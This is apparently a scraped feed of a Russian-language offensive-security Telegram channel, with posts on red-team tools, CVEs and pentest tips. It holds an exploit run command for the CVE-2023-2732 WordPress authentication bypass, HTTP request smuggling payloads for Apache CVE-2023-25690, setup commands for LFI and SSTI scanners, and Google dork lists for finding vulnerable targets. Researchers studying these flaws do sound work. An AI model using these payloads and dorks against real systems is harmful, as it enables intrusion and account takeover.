Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Похек
KotlinNotesForProfessionals.pdf
Судя по репостам контент понравился)
2
This media is not supported in your browser
VIEW IN TELEGRAM
7🔥7🎉2
Red Team Research

Коллекция PoC и наступательных техник, используемых BlackArrow Red Team

#collection
👏3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Что тут у нас? Ой, очередное LPE😁

https://github.com/Dec0ne/DavRelayUp


DavRelayUp - a universal no-fix LPE in domain-joined windows workstations where LDAP signing is not enforced (the default settings).


#ad #redteam #pentest #lpe
Объявляю неделю мемов про Apple Vision Pro открытой 😁
❤‍🔥12🌚2
MStore API <= 3.9.2 - Authentication Bypass
CVE-2023-2732

Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.

PoC:
git clone https://github.com/RandomRobbieBF/CVE-2023-2732 ; pip3 install -r requirements.txt ; python3 mstore-api.py -u http://TARGET


#CVE #POC
🆒3
Forwarded from Private Shizo
🔥CVE-2023-3079(bug id: 1450481) - Type Confusion in V8
( 0-day, may have been actively exploited/ITW )
Reviewed here:
4584248 "[ic] Fix store handler selection for arguments objects"
Forwarded from Monkey Hacker
Apache HTTP-Request-Smuggling (CVE-2023-25690)

Где-то в апреле была шумиха с новой вулной в Apache, когда mod_proxy вместе с правилами RewriteRule и ProxyPassMatch, приводил к HTTP-Request-Smuggling

В первом случае был следующий прикол

Пользователь запрашивает URL https://testik.com/categories/1, а RewriteRule сопоставляет URL и захватывает значение 1 с помощью регулярного выражения ^/categories/(.*). Затем правило переписывает URL на http://testik.com:8080/categories?id=1, добавляя перехваченное значение к переписанному URL в качестве id параметра запроса.

ProxyPassReverse, уже просто заменяет домен и адрес внутреннего сервера на домен и адрес прокси-сервера, чтобы клиент мог правильно переходить по ссылкам и получать доступ к контенту с проксированного внутреннего сервера /categories/ http://example-shop.com:8080/. Весело, да?


Плюс, замечу, что Apache был уязвим еще к CRLF-injection, который нам будет нужен в дальнейшем

Для его эксплуатации мы уже имеем следующиим запрос

GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1
Host: localhost


И теперь делаем смагглинг запрос

GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
Host: localhost


И ответ будет следующий

GET /categories.php?id=1 HTTP/1.1
Host: localhost

GET /SMUGGLED HTTP/1.1
Host: backend
PortSwigger Labs ERR_TIMED_OUT in Burp Suite browser

Если вы сталкивались с проблемой, когда лабы с PortSwigger не открываются в браузере BurpSuite. То вот решение:
1. Открываем браузер и переходим на chrome://flags
2. Далее в поиске пишем Encrypted ClientHello и ставим значение Disabled
3. Нажимаем Relaunch
4. Готово! Продуктивного похека 😎
5. Делимся этой шпорой

#полезное
5
🔴Lfi-Space - LFI Scan Tool

Установка:
git clone https://github.com/capture0x/Lfi-Space/ ; cd Lfi-Space ; pip3 install -r requirements.txt

Использование:
python3 lfi.py

Google Dorks'и для поиска LFI:
inurl:/filedown.php?file=
inurl:/news.php?include=
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:index2.php?to=
inurl:index.php?load=
inurl:home.php?pagina=
/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=

#tools
🔥3👏1
SSTI FINDER TOOL

SSTI Finder предназначен для обнаружения и идентификации уязвимостей Server-Side Template Injection (SSTI) в веб-приложениях. Уязвимости SSTI возникают, когда управляемый пользователем ввод прямо или косвенно включается в шаблоны на стороне сервера, что позволяет злоумышленнику выполнить произвольный код на сервере.

Установка:
git clone https://github.com/capture0x/SSTI-FINDER/ ; cd SSTI-FINDER ; bash setup.sh ; pip3 install -r requirements.txt ; chmod -R 755 ssti.py

Использование:
python3 ssti.py

Google Dorks'и для поиска SSTI:
inurl:https://confluence. login.action

inurl:https://wiki.*.com/confluence/

allinurl: /confluence/login.action?

“/spacedirectory/view.action”

“/pages/viewpage.action?”

“/pages/releaseview.action?”

“aboutconfluencepage.action”

#tools
🔥6🆒1
Forwarded from SHADOW:Group
▶️Раскрытые уязвимости на одном из сервисов IBM

Исследователь не поленился и записал три PoC'а для уязвимостей, найденных на одном из сервисов IBM.

1. IDOR в API, приводящий к извлечению личных данных и паролей всех пользователей.

2. Повышение привилегий до администратора через изменение роли.

3. Манипулирование запросом приводящее к обходу регистрации в панели сотрудников и манипулирование ответом приводящее к захвату учетной записи.

#web #ato #idor #privesc
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Forwarded from Private Shizo
Exploiting Errors in Windows Error Reporting in 2022.pdf
2.6 MB
💥Exploiting Errors in Windows Error Reporting in 2022